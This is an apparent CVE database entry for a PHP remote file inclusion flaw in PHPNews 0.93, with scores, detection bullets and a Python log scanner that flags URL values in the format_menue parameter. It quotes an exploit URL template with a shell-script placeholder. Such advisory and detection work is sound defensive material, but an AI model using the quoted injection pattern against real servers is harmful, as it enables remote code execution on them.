cbcvebase.
CVE-2007-4232
published 2007-08-08

Priority: P3 · 51 · medium
CVSS 2.0: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 51.65% (98.8th percentile)
PHP remote file inclusion vulnerability in admin/inc/change_action.php in Andreas Robertz PHPNews 0.93 allows remote attackers to execute arbitrary PHP code via a URL in the format_menue parameter.

Affected

1 range

Vendor | Product | Version range | Fixed in
andreas_robertz | phpnews | |

Detection & IOCs

path: admin/inc/change_action.php
url: http://site.com/path/admin/inc/change_action.php?format_menue=[[Sh3LLScript]]
  • Monitor HTTP requests targeting admin/inc/change_action.php with a URL-like value in the 'format_menue' GET parameter, which indicates a Remote File Inclusion (RFI) attempt against PHPNews 0.93.
  • Alert on any inbound GET request where the 'format_menue' parameter value begins with 'http://' or 'https://', as this is the direct exploitation vector for arbitrary PHP code execution.
  • The vulnerability is only exploitable if PHP's 'allow_url_include' (or 'allow_url_fopen' in older PHP versions) is enabled on the server, as the attack relies on remote file inclusion via a user-supplied URL.
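
One way to implement the alert described in the bullets above, as an added example (not code from this advisory or from PHPNews). It assumes Apache/nginx combined-format access logs; the function names, sample log lines and the example.invalid host are constructed for illustration. It goes slightly beyond the http:// and https:// cases by flagging any scheme:// value after percent-decoding.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/admin/inc/change_action.php"  # vulnerable script named on this page
PARAM = "format_menue"                        # parameter named on this page
# Any "scheme://" prefix is URL-like; http and https are the cases the page names.
URL_LIKE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Request line of an Apache/nginx combined-format entry (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def rfi_value(log_line):
    """Return the URL-like format_menue value in this log line, or None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    # Percent-decode the path and collapse repeated slashes before comparing.
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()
    if not path.endswith(TARGET_PATH):
        return None
    # parse_qs percent-decodes values, so http%3A%2F%2F is caught as well.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if URL_LIKE.match(value.strip()):
            return value
    return None


def scan(lines):
    """Return (line_number, value) for every line that should raise an alert."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = rfi_value(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample entries; addresses and hosts are documentation values.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Aug/2007:10:00:01 +0000] "GET /news/admin/inc/change_action.php?format_menue=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [08/Aug/2007:10:00:02 +0000] "GET /news/admin//inc/change_action.php?format_menue=hTTps%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [08/Aug/2007:10:00:03 +0000] "GET /news/admin/inc/change_action.php?format_menue=default HTTP/1.1" 200 512',
    '198.51.100.4 - - [08/Aug/2007:10:00:04 +0000] "GET /news/index.php?ref=http://example.invalid/ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: {PARAM} carries URL {value!r}")
```

The third sample line (plain value) and the fourth (different script) are not flagged, which keeps the rule tied to the path and parameter this CVE names.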